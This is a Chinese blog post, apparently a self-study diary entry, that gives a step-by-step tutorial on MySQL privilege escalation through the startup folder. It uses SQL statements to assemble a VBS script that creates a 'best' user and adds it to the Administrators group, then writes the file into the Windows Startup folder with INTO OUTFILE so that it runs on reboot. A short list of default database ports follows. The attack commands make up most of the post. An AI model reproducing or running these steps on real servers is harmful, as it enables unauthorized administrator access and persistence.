美文网首页
网络安全-Day50-Mysql启动项提权

网络安全-Day50-Mysql启动项提权

作者: K8s_Docker | 来源:发表于2020-05-11 19:11 被阅读0次

Mysql启动项提权

1、先删除一个数据库,保证在创建数据库时不会重复(drop database test1;)

2、新增数据库test1(create database test1;)

3、进入test1数据库(use test1;)

4、创建一个表,表名“a”,表内有个CMD字段(create table a (cmd text);)

5、在表a中插入数据,创建了一个对象(insert into a values ("set wshshell=createobject (""wscript.shell"")");)

6、给步骤5的对象,添加一个创建best账户的值(insert into a values ("a=wshshell.run (""cmd.exe /c net user best best /add"",0)");)

7、把best账户加入管理员组(insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best /add"",0)");)

注意:注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!

8、查询test1数据库中的a表(select * from a;)

9、把数据库中那三条数据组成得vbs文件,best.vbs文件导入到启动项中(select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//best.vbs";)

10、服务器的启动项中已经有best.vbs文件了

11、重启服务器,并生成best账户(best账户在andministrator组中)

mysql、mssql、orcal默认端口号

1、sqlserver:默认端口号为:1433

2、mysql:默认端口号为:3306

3、oracle:默认端口号为:1521

相关文章

网友评论

      本文标题:网络安全-Day50-Mysql启动项提权

      本文链接:https://www.haomeiwen.com/subject/axtlnhtx.html